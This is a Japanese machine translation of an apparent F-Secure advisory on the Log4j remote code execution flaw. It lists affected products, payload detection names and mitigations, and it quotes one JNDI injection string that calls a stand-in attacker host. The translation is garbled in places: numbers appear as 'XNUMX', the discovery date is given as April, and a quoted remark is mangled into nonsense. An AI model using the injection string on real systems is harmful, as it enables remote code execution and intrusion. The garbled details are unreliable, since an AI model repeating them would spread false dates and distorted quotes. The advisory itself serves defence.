4 月 10 日金曜日に発見された LogXNUMXJ ライブラリの脆弱性は、世界中のソフトウェア メーカーとサービス プロバイダーを揺るがしています。 Microsoft の Minecraft から e コマース プラットフォームまで、ソフトウェアのログ メッセージを処理するための標準化された方法の脆弱性は、すでに攻撃者によって攻撃されています。
脆弱なアプリケーションが現在もたらすリスクのレベルを説明することはほとんど不可能です。 脆弱性を狙ったユーザー制御の文字列がログに記録された場合、脆弱性はリモートで実行される可能性があります。 簡単に言えば、攻撃者はこの脆弱性を利用して、標的のシステムをだまして、リモートの場所からコードをフェッチして実行させることができます。 XNUMX 番目のステップでは、悪意のあるコードが何をすべきかは攻撃者次第です。
「ほぼ完璧な嵐」
この脆弱性は、企業のソフトウェアを複数のレベルで保護することがいかに難しいかを示しています。 古いバージョンの Java を含む古いソフトウェアにより、多くの企業は独自のパッチを開発するか、すぐにパッチを適用することを妨げています。 攻撃の脅威が非常に高く、ロギングが非常に重要なときに、Log4j のロギング機能にリアルタイムでパッチを適用するという課題から、別の問題が発生します。
Cybersecurity & Infrastructure Security Agency はブログ投稿で、推奨されるすべての対策を「直ちに」実施する必要があります。
さまざまなオンライン サービスが利用可能になったときに更新プログラムをインストールする以外に、個々のユーザーができることはあまりありません。 そして、それはすぐに起こるはずです。 企業や企業は、自社のシステムを保護しながら、ノンストップでパッチを展開するようになります。 その後、影響を受けるシステムでアクティブなセキュリティ インシデントが進行中かどうかを判断することが重要になります。
ほぼどこにでもある脆弱性
Log4J ライブラリを使用していないアプリケーションを見つけるのは、使用しているアプリケーションよりも難しい場合があります。 この遍在性は、攻撃者がほぼどこでも脆弱性を探すことができることを意味します。
「TeslaまたはiPhoneの名前を変更してください NOT F-Secure の最高情報セキュリティ責任者である Erka Koivunen は、 冗談.
Log4J のフォーマット言語を使用すると、脆弱なアプリケーションでマルウェアがトリガーされる可能性があります。 ご存知のように、たとえば Minecraft のチャットで ${jndi:ldap://attacker.com/pwnyourserver} のようなフレーズに言及しただけで、パッチが適用されていないシステムの Microsoft でセキュリティ ストームが発生する可能性があります。
F-Secure 製品は影響を受けますか?
F-Secure は、次の製品がこの脆弱性の影響を受けると判断しました:
- F-Secure ポリシー マネージャ
- F-Secure ポリシー マネージャ プロキシ
- F-Secure エンドポイント プロキシ
- F-Secure エレメント コネクタ
これらの製品の Windows バージョンと Linux バージョンの両方が影響を受けるため、直ちにパッチを適用する必要があります。
F-Secure 製品にパッチを適用するにはどうすればよいですか?
この脆弱性に対するセキュリティ パッチを開発しました。 この脆弱性に関するニュースと更新情報は、コミュニティ ページで継続的に公開されています。
F-Secure はこの脆弱性に対してどのような保護を提供していますか?
F-Secure エンドポイント プロテクション (EPP) は、最新のローカル エクスプロイト ファイルの検出によって常に更新されていますが、脆弱性が悪用される可能性がある多くの方法を考えると、これは問題の一部にしか対応していません.
EPP 検出は、通常どおり、悪用後の段階で見られるペイロードを処理します。 この記事の執筆時点で、F-Secure はいくつかの重大な攻撃シナリオをカバーする次の検出を行いました。 これらは、Log4j エクスプロイトに関連して確認された悪意のあるペイロードです。
- TR/Drop.Cobacis.AL
- TR/Rozena.wrdej
- TR/PShell.Agent.SWR
- TR/コブラ.G1
- TR/AD.MeterpreterSC.rywng
これらの検出の多くは、F-Secure EPP で数か月にわたって利用可能でした。これは、お客様がこれらのペイロードからプロアクティブに保護されていることを意味します。
エクスプロイトを利用する方法は複数あるため、他の既存の検出も役立ちます。 この有用な検出のリストは、状況の変化に応じて継続的に更新されます。 追加の是正措置については、次のセクションの一般的な推奨事項を参照してください。
一般的に、メーカーに関係なく、どのソフトウェアでもどのようなアクションをとるべきですか?
- ネットワーク アクセスを制限するか、信頼できるサイトに制限します。 システムがインターネットに接続して悪意のあるコードを取得できない場合、攻撃は失敗します。
- セキュリティの脆弱性に対するパッチやその他の修正に関する情報については、ベンダーに定期的に確認してください。
- F-Secure Elements Vulnerability Management は、脆弱なシステムの特定に役立ちます。
- F-Secure Elements Endpoint Protection または F-Secure Business Suite 製品は、それらがインストールされているシステム上の脆弱なソフトウェアを検出してパッチを適用できます。
F-Secure はまた、すべての顧客とユーザーを常に最新の状態に保ちます。
詳細は F-Secure.com をご覧ください
エフセキュアについて 実際のサイバー攻撃について、F-Secure ほど優れた洞察を持っている人はいません。 検出と対応の間のギャップを埋めます。 これを行うために、当社は何百人もの業界トップの技術コンサルタントの比類のない脅威の専門知識、受賞歴のあるソフトウェアを実行している何百万ものデバイスからのデータ、および人工知能における進行中のイノベーションを活用しています。 主要な銀行、航空会社、企業は、世界で最も危険なサイバー脅威と戦うという私たちの取り組みを信頼しています。 トップ チャネル パートナーと 200 以上のサービス プロバイダーのネットワークと共に、私たちの使命は、すべてのお客様のニーズに合わせたエンタープライズ レベルのサイバーセキュリティを提供することです。 1988 年に設立された F-Secure は、NASDAQ OMX Helsinki Ltd に上場しています。